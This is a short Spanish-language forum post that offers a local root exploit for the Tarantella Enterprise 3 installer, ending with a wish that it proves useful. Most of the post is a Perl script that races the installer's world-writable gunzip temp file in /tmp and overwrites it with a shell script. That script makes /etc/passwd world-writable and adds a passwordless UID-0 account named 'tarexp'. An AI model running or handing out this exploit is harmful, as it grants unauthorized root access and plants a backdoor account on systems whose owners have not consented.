Tengo un exploit interesante que te da privilegios de root en la máquina local:
Se trata de que tengan instalado el programa Tarantella Enterprice 3, entonces éste programa tiene problemas con los permisos en algunos de los archivos temporales usados durante el proceso de instalación, esto hace que un atacante obtenga privilegios elevados:
Exploit:
#!/usr/bin/perl -w
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar
[email protected] 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#http://online.securityfocus.com/bid/3966
#Experimental ext3 kernel mods for preventing/researching race conditions.
#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html
use strict;
`cat << -EOF- > root.sh
#!/bin/sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
-EOF-`;
my $OUT = '';
while(!$OUT) {
$OUT = `ps -ax |grep gunzip |grep -v grep`;
print "Found $OUT\n";
}
my @args = split(' ',$OUT);
# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
while(1) {
`cp root.sh $args[4]`;
}
Espero que te sirva